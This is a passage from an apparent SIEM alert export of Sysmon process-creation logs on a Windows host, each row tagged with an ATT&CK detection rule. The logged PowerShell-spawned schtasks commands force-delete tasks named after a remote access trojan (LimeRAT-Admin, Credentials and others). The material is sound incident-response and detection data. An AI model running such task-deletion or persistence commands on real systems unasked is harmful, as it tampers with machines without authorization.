Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.260",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.899 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001059f12100} +ProcessId: 3844 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.902820500Z"",""eventRecordID"":""2838"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.899\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001059f12100}\r\nProcessId: 3844\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.899"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001059f12100}"",""processId"":""3844"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.246",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.868 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001090ef2100} +ProcessId: 7636 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN LimeRAT-Admin /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.870638500Z"",""eventRecordID"":""2837"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.868\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001090ef2100}\r\nProcessId: 7636\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.868"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001090ef2100}"",""processId"":""7636"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN LimeRAT-Admin /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.213",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.829 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010aeed2100} +ProcessId: 5964 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HispDemorn /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.836676300Z"",""eventRecordID"":""2836"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.829\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010aeed2100}\r\nProcessId: 5964\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.829"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010aeed2100}"",""processId"":""5964"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HispDemorn /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.200",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.790 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-0010d2eb2100} +ProcessId: 6784 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN werclpsyport /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.792724600Z"",""eventRecordID"":""2835"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.790\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010d2eb2100}\r\nProcessId: 6784\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.790"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010d2eb2100}"",""processId"":""6784"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN werclpsyport /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.190",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.750 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001010ea2100} +ProcessId: 3496 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN TablteInputout /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.753537100Z"",""eventRecordID"":""2834"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.750\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001010ea2100}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.750"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001010ea2100}"",""processId"":""3496"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN TablteInputout /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.165",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.710 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001067e82100} +ProcessId: 8004 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Credentials /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.720798700Z"",""eventRecordID"":""2833"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.710\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001067e82100}\r\nProcessId: 8004\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.710"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001067e82100}"",""processId"":""8004"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Credentials /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 